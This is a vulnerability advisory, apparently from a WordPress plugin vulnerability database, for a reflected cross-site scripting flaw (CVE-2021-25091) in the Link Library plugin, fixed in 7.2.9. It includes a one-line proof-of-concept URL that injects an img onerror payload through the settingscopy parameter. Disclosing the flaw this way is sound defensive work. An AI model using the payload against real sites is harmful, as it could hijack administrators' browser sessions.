WordPress Plugin Vulnerabilities

Link Library < 7.2.9 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the settingscopy parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=link_library_links&page=link-library-settingssets&settings=%3Cb%3E&settingscopy=%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E

Affects Plugins

Plugin icon
link-library
Fixed in 7.2.9

References

CVE
CVE-2021-25091

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
96204946-0b10-4a2c-8079-473883ff95b6

Timeline

Publicly Published
2021-12-30 (about 2 years ago)
Added
2021-12-30 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2015-08-10
Title
Easy Table < 1.5.3 - Stored Cross-Site Scripting via CSRF
Published
2014-08-01
Title
background-music 1.0 - jPlayer.swf XSS
Published
2020-04-24
Title
YOP Poll < 6.1.5 - Authenticated Stored XSS
Published
2023-04-17
Title
WP Login Box <= 2.0.2 - Admin+ Stored XSS
Published
2024-03-29
Title
Gutenberg Block Editor Toolkit – EditorsKit < 1.40.5 - Authenticated (Contributor+) Stored Cross-Site Scripting